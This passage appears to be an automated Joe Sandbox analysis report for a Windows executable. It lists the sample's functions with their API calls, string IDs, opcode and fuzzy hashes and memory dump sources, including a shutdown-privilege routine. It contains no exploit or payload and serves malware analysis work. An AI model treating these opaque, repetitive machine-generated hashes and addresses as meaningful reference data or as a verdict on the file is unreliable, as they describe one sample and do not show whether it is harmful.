                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

                                                                                Non-executed Functions

                                                                                Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: SystemTime
                                                                                • String ID:
                                                                                • API String ID: 2656138-0
                                                                                • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                • API String ID: 4190037839-2401316094
                                                                                • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                • LocalFree.KERNEL32(0044F4F0,00000000,00401AB4), ref: 00401A1B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0044F4F0,00000000,00401AB4), ref: 00401A3A
                                                                                • LocalFree.KERNEL32(004504F0,?,00000000,00008000,0044F4F0,00000000,00401AB4), ref: 00401A79
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: E
                                                                                • API String ID: 3782394904-409520393
                                                                                • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                  • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000$9@
                                                                                • API String ID: 1220098344-1503883590
                                                                                • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                Function 00401918 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: E
                                                                                • API String ID: 730355536-409520393
                                                                                • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
